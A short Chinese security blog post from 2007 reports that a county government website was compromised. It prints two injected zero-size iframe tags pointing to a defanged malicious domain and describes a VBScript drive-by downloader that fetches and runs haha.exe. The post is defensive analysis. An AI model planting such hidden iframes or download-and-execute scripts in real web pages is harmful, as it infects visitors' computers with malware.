某县政府信息网被挂马 haha.exe

endurer 原创
2007-03-09 第1版

该信息网首页多处被加入代码：
/---
＜iframe src=hxxp://www.ma***p*l**etang.com/bbs/jpg.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.ma***p*l**etang.com/bbs/gif.htm width=0 height=0＞＜/iframe＞
---/

hxxp://www.ma***p*l**etang.com/bbs/gif.htm 包含VBScript代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 haha.exe，保存为 %temp%/~temp351.exe，并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

网页中还包含字符串“黑吧专用网马生成器”及一个QQ号码。

haha.exe可能已不存在，无法下载。

hxxp://www.ma***p*l**etang.com/bbs/jpg.htm
不存在。